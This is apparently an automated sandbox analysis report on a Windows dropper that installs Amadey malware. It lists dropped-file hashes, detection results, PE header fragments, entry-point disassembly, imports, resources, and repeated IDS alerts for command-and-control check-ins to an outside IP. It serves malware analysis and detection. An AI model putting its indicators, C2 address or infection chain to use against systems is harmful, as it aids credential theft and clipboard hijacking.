                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):371712
                                                                      Entropy (8bit):6.668565124013179
                                                                      Encrypted:false
                                                                      SSDEEP:6144:x/LzDM0Y/Wuw3iNcTfi5xExViGUTuQj9gZaM5:x/PD8WDyGViBTlj6ZD
                                                                      MD5:01BC3DF99AB67BABCDC1577241E3EE87
                                                                      SHA1:C11C6465D4DE6B6588B565C577A9EAAD80D409D4
                                                                      SHA-256:778BD7B213D42773DEEB1DF58089F30FC9310555A97A9654A90AFB63208BBC9A
                                                                      SHA-512:107CA576ED9599A079F9C2E90EDE1F60313A59C0C46B99272665A5D8B56166DC7AF422B9E8CD65C20FD7F878D03C64A06ED0AF943B95967E92B8CCB4AABC6A95
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 28%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6BX.W,..W,..W,......W,......W,......W,...W..W,..W-..W,......W,......W,......W,.Rich.W,.........PE..L.....}b.............................d.......0....@..........................`......!...........................................x........8...................@.......................................5..@............................................text............................... ..`.data........0......................@....baveke..............4..............@..@.hewi...F............8..............@..@.zax.................R..............@..@.rsrc....8.......:...V..............@..@.reloc..,....@......................@..B........................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):11264
                                                                      Entropy (8bit):4.97029807367379
                                                                      Encrypted:false
                                                                      SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                      MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                                      SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                                      SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                                      SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 82%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
                                                                      Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):91136
                                                                      Entropy (8bit):6.3469756750979025
                                                                      Encrypted:false
                                                                      SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                                      MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                                      SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                                      SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                                      SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):4.621829903792328
                                                                      Encrypted:false
                                                                      SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                                                                      MD5:1B7C22A214949975556626D7217E9A39
                                                                      SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                                                                      SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                                                                      SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                                                                      Malicious:false
                                                                      Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                                                                      Process:C:\Windows\SysWOW64\cacls.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):15
                                                                      Entropy (8bit):3.240223928941852
                                                                      Encrypted:false
                                                                      SSDEEP:3:o3F:o1
                                                                      MD5:509B054634B6DE74F111C3E646BC80FD
                                                                      SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                                                      SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                                                      SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                                                      Malicious:false
                                                                      Preview:processed dir:
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.831493173388932
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:file.exe
                                                                      File size:587776
                                                                      MD5:3ac20281c213c418608fcea6d744ae8f
                                                                      SHA1:694ee56f317c410cce4bb0dec9b1d6b6f4059f48
                                                                      SHA256:f33d6a14fc683aa41846e4073347b71810d835e5f7695dd834b98007826ec831
                                                                      SHA512:e07863755daa7e2fe075a6541f3bcb05c805eb807bbd6cbbe90bc659dfd1ea5b74d39ab03da1891eefbb32b64897c3ff98f28cd720648c879f0797df988872f6
                                                                      SSDEEP:12288:DMrky90ARrgdnN+A+9B1e04d/0htzFDFN0n/tL35gox8j:zyrOVK4dshHP0n/V3Rqj
                                                                      TLSH:50C40243B7E84572E8B41B700DFA03C30A36FE915639825B264EBE5E1C73664723676B
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                                                                      Icon Hash:f8e0e4e8ecccc870
                                                                      Entrypoint:0x406a60
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:10
                                                                      OS Version Minor:0
                                                                      File Version Major:10
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:10
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                      Instruction
                                                                      call 00007F2444AA48A5h
                                                                      jmp 00007F2444AA41B5h
                                                                      push 00000058h
                                                                      push 004072B8h
                                                                      call 00007F2444AA4947h
                                                                      xor ebx, ebx
                                                                      mov dword ptr [ebp-20h], ebx
                                                                      lea eax, dword ptr [ebp-68h]
                                                                      push eax
                                                                      call dword ptr [0040A184h]
                                                                      mov dword ptr [ebp-04h], ebx
                                                                      mov eax, dword ptr fs:[00000018h]
                                                                      mov esi, dword ptr [eax+04h]
                                                                      mov edi, ebx
                                                                      mov edx, 004088ACh
                                                                      mov ecx, esi
                                                                      xor eax, eax
                                                                      lock cmpxchg dword ptr [edx], ecx
                                                                      test eax, eax
                                                                      je 00007F2444AA41CAh
                                                                      cmp eax, esi
                                                                      jne 00007F2444AA41B9h
                                                                      xor esi, esi
                                                                      inc esi
                                                                      mov edi, esi
                                                                      jmp 00007F2444AA41C2h
                                                                      push 000003E8h
                                                                      call dword ptr [0040A188h]
                                                                      jmp 00007F2444AA4189h
                                                                      xor esi, esi
                                                                      inc esi
                                                                      cmp dword ptr [004088B0h], esi
                                                                      jne 00007F2444AA41BCh
                                                                      push 0000001Fh
                                                                      call 00007F2444AA46DBh
                                                                      pop ecx
                                                                      jmp 00007F2444AA41ECh
                                                                      cmp dword ptr [004088B0h], ebx
                                                                      jne 00007F2444AA41DEh
                                                                      mov dword ptr [004088B0h], esi
                                                                      push 004010C4h
                                                                      push 004010B8h
                                                                      call 00007F2444AA4306h
                                                                      pop ecx
                                                                      pop ecx
                                                                      test eax, eax
                                                                      je 00007F2444AA41C9h
                                                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                                                      mov eax, 000000FFh
                                                                      jmp 00007F2444AA42E9h
                                                                      mov dword ptr [004081E4h], esi
                                                                      cmp dword ptr [004088B0h], esi
                                                                      jne 00007F2444AA41CDh
                                                                      push 004010B4h
                                                                      push 004010ACh
                                                                      call 00007F2444AA4895h
                                                                      pop ecx
                                                                      pop ecx
                                                                      mov dword ptr [000088B0h], 00000000h
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x870ec.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x940000x888.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xc0000x880000x87200False0.9312774629972248data7.8718708761847305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x940000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountry
                                                                      AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                                                      RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                                      RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                      RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                                                                      RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                                      RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                      RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                                      RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                                                      RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                      RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                      RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                      RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                      RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                                      RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                      RT_DIALOG0x247400x2f2dataEnglishUnited States
                                                                      RT_DIALOG0x24a340x35cdataRussianRussia
                                                                      RT_DIALOG0x24d900x1b0dataEnglishUnited States
                                                                      RT_DIALOG0x24f400x1b4dataRussianRussia
                                                                      RT_DIALOG0x250f40x166dataEnglishUnited States
                                                                      RT_DIALOG0x2525c0x168dataRussianRussia
                                                                      RT_DIALOG0x253c40x1c0dataEnglishUnited States
                                                                      RT_DIALOG0x255840x1e0dataRussianRussia
                                                                      RT_DIALOG0x257640x130dataEnglishUnited States
                                                                      RT_DIALOG0x258940x150dataRussianRussia
                                                                      RT_DIALOG0x259e40x120dataEnglishUnited States
                                                                      RT_DIALOG0x25b040x122dataRussianRussia
                                                                      RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                                                      RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                                                                      RT_STRING0x25d3c0x520dataEnglishUnited States
                                                                      RT_STRING0x2625c0x52edataRussianRussia
                                                                      RT_STRING0x2678c0x5ccdataEnglishUnited States
                                                                      RT_STRING0x26d580x592dataRussianRussia
                                                                      RT_STRING0x272ec0x4b0dataEnglishUnited States
                                                                      RT_STRING0x2779c0x4b2dataRussianRussia
                                                                      RT_STRING0x27c500x44adataEnglishUnited States
                                                                      RT_STRING0x2809c0x43edataRussianRussia
                                                                      RT_STRING0x284dc0x3cedataEnglishUnited States
                                                                      RT_STRING0x288ac0x2fcdataRussianRussia
                                                                      RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                      RT_RCDATA0x28bb00x6940eMicrosoft Cabinet archive data, many, 431118 bytes, 2 files, at 0x2c +A "brJg.exe" +A "xriv.exe", ID 1582, number 1, 20 datablocks, 0x1503 compressionEnglishUnited States
                                                                      RT_RCDATA0x91fc00x4dataEnglishUnited States
                                                                      RT_RCDATA0x91fc40x24dataEnglishUnited States
                                                                      RT_RCDATA0x91fe80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                      RT_RCDATA0x91ff00x7ASCII text, with no line terminatorsEnglishUnited States
                                                                      RT_RCDATA0x91ff80x4dataEnglishUnited States
                                                                      RT_RCDATA0x91ffc0x9ASCII text, with no line terminatorsEnglishUnited States
                                                                      RT_RCDATA0x920080x4dataEnglishUnited States
                                                                      RT_RCDATA0x9200c0x9ASCII text, with no line terminatorsEnglishUnited States
                                                                      RT_RCDATA0x920180x4dataEnglishUnited States
                                                                      RT_RCDATA0x9201c0x6dataEnglishUnited States
                                                                      RT_RCDATA0x920240x7ASCII text, with no line terminatorsEnglishUnited States
                                                                      RT_RCDATA0x9202c0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                      RT_GROUP_ICON0x920340xbcdataEnglishUnited States
                                                                      RT_VERSION0x920f00x408dataEnglishUnited States
                                                                      RT_VERSION0x924f80x410dataRussianRussia
                                                                      RT_MANIFEST0x929080x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                      DLLImport
                                                                      ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                      KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                                      GDI32.dllGetDeviceCaps
                                                                      USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                                      msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                                      COMCTL32.dll
                                                                      Cabinet.dll
                                                                      VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States
                                                                      RussianRussia
                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      192.168.2.762.204.41.449808802027700 02/06/23-18:36:19.520673TCP2027700ET TROJAN Amadey CnC Check-In4980880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449869802027700 02/06/23-18:36:34.178044TCP2027700ET TROJAN Amadey CnC Check-In4986980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450136802027700 02/06/23-18:37:49.465984TCP2027700ET TROJAN Amadey CnC Check-In5013680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450329802027700 02/06/23-18:38:39.784785TCP2027700ET TROJAN Amadey CnC Check-In5032980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449906802027700 02/06/23-18:36:47.288237TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450295802027700 02/06/23-18:38:31.730774TCP2027700ET TROJAN Amadey CnC Check-In5029580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450041802027700 02/06/23-18:37:24.611334TCP2027700ET TROJAN Amadey CnC Check-In5004180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450099802027700 02/06/23-18:37:39.765161TCP2027700ET TROJAN Amadey CnC Check-In5009980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450197802027700 02/06/23-18:38:04.844993TCP2027700ET TROJAN Amadey CnC Check-In5019780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450332802027700 02/06/23-18:38:40.516329TCP2027700ET TROJAN Amadey CnC Check-In5033280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449774802027700 02/06/23-18:36:09.754520TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449872802027700 02/06/23-18:36:35.424116TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450038802027700 02/06/23-18:37:23.886376TCP2027700ET TROJAN Amadey CnC Check-In5003880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450234802027700 02/06/23-18:38:15.320717TCP2027700ET TROJAN Amadey CnC Check-In5023480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449811802027700 02/06/23-18:36:20.234434TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449967802027700 02/06/23-18:37:04.009354TCP2027700ET TROJAN Amadey CnC Check-In4996780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449746802027700 02/06/23-18:36:02.941804TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450074802027700 02/06/23-18:37:33.782821TCP2027700ET TROJAN Amadey CnC Check-In5007480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450172802027700 02/06/23-18:37:58.795470TCP2027700ET TROJAN Amadey CnC Check-In5017280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450270802027700 02/06/23-18:38:23.999396TCP2027700ET TROJAN Amadey CnC Check-In5027080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449844802027700 02/06/23-18:36:28.246222TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450304802027700 02/06/23-18:38:33.925233TCP2027700ET TROJAN Amadey CnC Check-In5030480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449939802027700 02/06/23-18:36:57.241621TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450066802027700 02/06/23-18:37:30.995908TCP2027700ET TROJAN Amadey CnC Check-In5006680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450267802027700 02/06/23-18:38:23.274292TCP2027700ET TROJAN Amadey CnC Check-In5026780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450013802027700 02/06/23-18:37:17.791988TCP2027700ET TROJAN Amadey CnC Check-In5001380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449897802027700 02/06/23-18:36:42.089661TCP2027700ET TROJAN Amadey CnC Check-In4989780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449816802027700 02/06/23-18:36:21.444072TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450144802027700 02/06/23-18:37:52.098502TCP2027700ET TROJAN Amadey CnC Check-In5014480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450239802027700 02/06/23-18:38:16.554901TCP2027700ET TROJAN Amadey CnC Check-In5023980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449779802027700 02/06/23-18:36:10.997636TCP2027700ET TROJAN Amadey CnC Check-In4977980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449975802027700 02/06/23-18:37:05.978493TCP2027700ET TROJAN Amadey CnC Check-In4997580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449934802027700 02/06/23-18:36:56.059242TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450262802027700 02/06/23-18:38:22.083151TCP2027700ET TROJAN Amadey CnC Check-In5026280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450108802027700 02/06/23-18:37:41.895553TCP2027700ET TROJAN Amadey CnC Check-In5010880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449738802027700 02/06/23-18:36:01.020544TCP2027700ET TROJAN Amadey CnC Check-In4973880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449970802027700 02/06/23-18:37:04.713405TCP2027700ET TROJAN Amadey CnC Check-In4997080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450357802027700 02/06/23-18:38:48.553891TCP2027700ET TROJAN Amadey CnC Check-In5035780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450340802027700 02/06/23-18:38:42.464572TCP2027700ET TROJAN Amadey CnC Check-In5034080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450103802027700 02/06/23-18:37:40.718413TCP2027700ET TROJAN Amadey CnC Check-In5010380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449990802027700 02/06/23-18:37:09.711792TCP2027700ET TROJAN Amadey CnC Check-In4999080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449892802027700 02/06/23-18:36:40.888979TCP2027700ET TROJAN Amadey CnC Check-In4989280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450352802027700 02/06/23-18:38:47.330598TCP2027700ET TROJAN Amadey CnC Check-In5035280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449733802027700 02/06/23-18:35:59.781456TCP2027700ET TROJAN Amadey CnC Check-In4973380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450000802027700 02/06/23-18:37:14.484343TCP2027700ET TROJAN Amadey CnC Check-In5000080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450079802027700 02/06/23-18:37:34.965164TCP2027700ET TROJAN Amadey CnC Check-In5007980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450082802027700 02/06/23-18:37:35.692289TCP2027700ET TROJAN Amadey CnC Check-In5008280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450309802027700 02/06/23-18:38:35.147885TCP2027700ET TROJAN Amadey CnC Check-In5030980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450254802027700 02/06/23-18:38:20.179240TCP2027700ET TROJAN Amadey CnC Check-In5025480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449782802027700 02/06/23-18:36:11.473355TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449852802027700 02/06/23-18:36:29.914060TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.762.204.41.4
